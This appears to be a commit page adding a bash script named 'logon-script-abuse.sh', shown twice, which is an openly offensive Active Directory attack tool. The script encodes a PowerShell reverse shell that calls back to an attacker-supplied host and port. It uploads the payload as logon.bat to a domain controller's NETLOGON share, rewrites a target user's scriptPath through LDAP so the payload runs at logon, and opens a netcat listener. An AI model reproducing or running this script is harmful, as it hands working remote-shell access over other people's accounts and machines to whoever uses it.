kennystrawnmusic · April 10, 2025 19:23
diff --git a/logon-script-abuse.sh b/logon-script-abuse.sh
 #!/bin/bash

 IP="$1"
 DOMAIN="$2"
 PRINCIPAL_USER="$3"
 TARGET_USER="$4"
 PASSWORD="$5"
 DIR="$6"
 LHOST="$7"
 LPORT="$8"

 PAYLOAD=$(python3 -c "import base64; print(base64.b64encode((r\"\"\"\$client = New-Object System.Net.Sockets.TCPClient(\"$LHOST\",$LPORT);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + \"PS \" + (pwd).Path + \"> \";\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\"\"\").encode(\"utf-16-le\")).decode())")

 cat > $TARGET_USER.ldif << EOF
 dn: CN=$TARGET_USER,CN=Users,DC=$(echo $DOMAIN | cut -d'.' -f1),DC=$(echo $DOMAIN | cut -d'.' -f2)
 changetype: modify
 replace: scriptPath
 scriptPath: $DIR\logon.bat
 EOF

 cat > logon.bat << EOF
 powershell -ep bypass -WindowStyle Hidden -e $PAYLOAD
 EOF

 smbclient //$IP/NETLOGON -U $PRINCIPAL_USER%$PASSWORD --directory $DIR -c "put logon.bat"
 ldapmodify -H ldap://$IP -x -D $PRINCIPAL_USER@$DOMAIN -w $PASSWORD -f $TARGET_USER.ldif
 ldapsearch -LLL -H ldap://$IP -x -D $PRINCIPAL_USER@$DOMAIN -w $PASSWORD -b "DC=$(echo $DOMAIN | cut -d'.' -f1),DC=$(echo $DOMAIN | cut -d'.' -f2)" "(sAMAccountName=$TARGET_USER)" scriptPath

 rlwrap nc -lvnp $LPORT
	#!/bin/bash

	IP="$1"
	DOMAIN="$2"
	PRINCIPAL_USER="$3"
	TARGET_USER="$4"
	PASSWORD="$5"
	DIR="$6"
	LHOST="$7"
	LPORT="$8"

	PAYLOAD=$(python3 -c "import base64; print(base64.b64encode((r\"\"\"\$client = New-Object System.Net.Sockets.TCPClient(\"$LHOST\",$LPORT);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535\|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 \| Out-String );\$sendback2 = \$sendback + \"PS \" + (pwd).Path + \"> \";\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\"\"\").encode(\"utf-16-le\")).decode())")

	cat > $TARGET_USER.ldif << EOF
	dn: CN=$TARGET_USER,CN=Users,DC=$(echo $DOMAIN \| cut -d'.' -f1),DC=$(echo $DOMAIN \| cut -d'.' -f2)
	changetype: modify
	replace: scriptPath
	scriptPath: $DIR\logon.bat
	EOF

	cat > logon.bat << EOF
	powershell -ep bypass -WindowStyle Hidden -e $PAYLOAD
	EOF

	smbclient //$IP/NETLOGON -U $PRINCIPAL_USER%$PASSWORD --directory $DIR -c "put logon.bat"
	ldapmodify -H ldap://$IP -x -D $PRINCIPAL_USER@$DOMAIN -w $PASSWORD -f $TARGET_USER.ldif
	ldapsearch -LLL -H ldap://$IP -x -D $PRINCIPAL_USER@$DOMAIN -w $PASSWORD -b "DC=$(echo $DOMAIN \| cut -d'.' -f1),DC=$(echo $DOMAIN \| cut -d'.' -f2)" "(sAMAccountName=$TARGET_USER)" scriptPath

	rlwrap nc -lvnp $LPORT
No results found